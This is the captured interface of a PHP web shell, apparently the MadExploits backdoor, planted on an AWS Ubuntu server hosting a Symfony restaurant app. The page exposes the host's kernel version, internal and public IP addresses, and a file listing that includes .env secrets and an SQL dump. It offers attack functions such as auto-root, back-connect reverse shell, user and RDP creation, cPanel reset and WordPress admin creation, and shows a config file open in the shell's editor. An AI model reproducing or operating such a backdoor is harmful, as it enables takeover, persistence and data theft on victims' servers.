Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.218.124.105
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
restaurants /
[ HOME SHELL ]
Name
Size
Permission
Action
.git
[ DIR ]
drwxrwxr-x
bin
[ DIR ]
drwxrwxr-x
config
[ DIR ]
drwxrwxr-x
migrations
[ DIR ]
drwxrwxr-x
public
[ DIR ]
drwxrwxr-x
src
[ DIR ]
drwxrwxr-x
templates
[ DIR ]
drwxrwxr-x
tests
[ DIR ]
drwxrwxr-x
translations
[ DIR ]
drwxrwxr-x
var
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxr-x
.DS_Store
6
KB
-rw-rw-r--
.Procfile
43
B
-rw-rw-r--
.env
2.29
KB
-rw-rw-r--
.env.example
2.09
KB
-rw-rw-r--
.env.test
215
B
-rw-rw-r--
.gitignore
501
B
-rw-rw-r--
amply.sql
11.68
KB
-rw-rw-r--
composer
1.82
MB
-rwxrwxr-x
composer.json
2.77
KB
-rw-rw-r--
composer.lock
420.65
KB
-rw-rw-r--
phpunit.xml.dist
1.24
KB
-rw-rw-r--
symfony.lock
18.02
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpunit.xml.dist
<?xml version="1.0" encoding="UTF-8"?> <!-- https://phpunit.readthedocs.io/en/latest/configuration.html --> <phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="vendor/phpunit/phpunit/phpunit.xsd" backupGlobals="false" colors="true" bootstrap="tests/bootstrap.php" > <php> <ini name="error_reporting" value="-1" /> <server name="APP_ENV" value="test" force="true" /> <server name="SHELL_VERBOSITY" value="-1" /> <server name="SYMFONY_PHPUNIT_REMOVE" value="" /> <server name="SYMFONY_PHPUNIT_VERSION" value="9.5" /> </php> <testsuites> <testsuite name="Project Test Suite"> <directory>tests</directory> </testsuite> </testsuites> <coverage processUncoveredFiles="true"> <include> <directory suffix=".php">src</directory> </include> </coverage> <listeners> <listener class="Symfony\Bridge\PhpUnit\SymfonyTestsListener" /> </listeners> <!-- Run `composer require symfony/panther` before enabling this extension --> <!-- <extensions> <extension class="Symfony\Component\Panther\ServerExtension" /> </extensions> --> </phpunit>
Close